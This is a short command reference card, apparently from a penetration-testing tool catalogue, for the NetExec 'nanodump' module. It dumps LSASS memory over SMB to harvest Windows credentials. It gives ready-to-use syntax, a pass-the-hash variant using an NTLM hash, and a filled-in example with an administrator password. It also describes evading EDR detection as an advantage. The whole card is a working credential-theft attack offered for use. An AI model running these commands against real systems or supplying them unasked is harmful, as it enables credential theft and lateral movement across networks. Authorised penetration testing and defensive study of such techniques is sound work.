NetExec nanodump Module

Dump LSASS using the nanodump BOF/PE technique — minimal dump, fewer EDR signatures than full minidumps, parsed locally with pypykatz. Requires local admin.

Tool
nxc
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb <target> -u '<user>' -p '<password>' -M nanodump

Credential variants

The same attack using a different authentication material.

Hash Auth requires NTLM hash

nxc smb <target> -u '<user>' -H '<hash>' -M nanodump

Examples

nxc smb 10.10.10.10 -u administrator -p 'Password123!' -M nanodump

Tags

netexec nxc nanodump lsass evasion

References